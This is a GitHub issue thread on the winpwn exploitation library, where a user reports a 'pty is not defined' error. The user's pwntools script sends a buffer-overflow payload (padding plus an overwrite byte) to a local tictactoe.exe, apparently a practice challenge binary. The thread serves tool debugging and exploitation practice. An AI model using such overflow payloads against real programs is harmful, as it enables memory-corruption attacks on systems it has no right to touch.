### ISSUE TITLE
NameError: name 'pty' is not defined

### ISSUE THREAD

**Issue by Kobe972** [Byzero512/winpwn#5]
from pwn import *
context.log_level="debug"
io=process(".\\tictactoe.exe")
payload="(2,2)"+138*"a"+"\0x01"
io.recvuntil("): ")
io.sendline(payload)
io.interactive()

The error occurs when implementing tictactoe.exe. The exe file can run normally on cmd, and  can also be decompiled by IDA.

**Comment by Byzero512** [comment]
maybe the code is: `io=process(".\\tictactoe.exe")`
